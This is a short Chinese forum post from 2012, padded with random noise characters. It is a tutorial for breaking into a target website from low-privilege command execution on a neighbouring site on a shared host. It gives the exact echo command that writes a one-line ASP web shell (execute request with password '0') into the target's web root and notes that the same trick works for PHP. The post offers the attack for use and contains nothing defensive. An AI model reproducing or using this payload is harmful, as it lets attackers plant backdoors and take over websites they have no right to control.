在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
, A2 \, Y$ |" x: I2 {5 {6 `5 m7 a! Z
命令格式
" O8 F- e% |8 u4 P, s! a
) f3 S) V& Q; C9 {Echo 语句 >目标站绝对目录2 d+ f1 u6 J, n( }) L& l0 z! s
7 H% ]0 V7 O9 j0 J( M- m例如:
0 U3 g3 O. C+ A2 X) q
; i9 _, k7 _: qecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
( _! @6 X' V- [- Y( K1 w
- O [9 Z0 [4 Q4 @2 |5 {* p: q. S这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
2 j" W2 e9 t/ E2 j' Q |
发表于 2012-9-23 14:40:24
收藏
支持
反对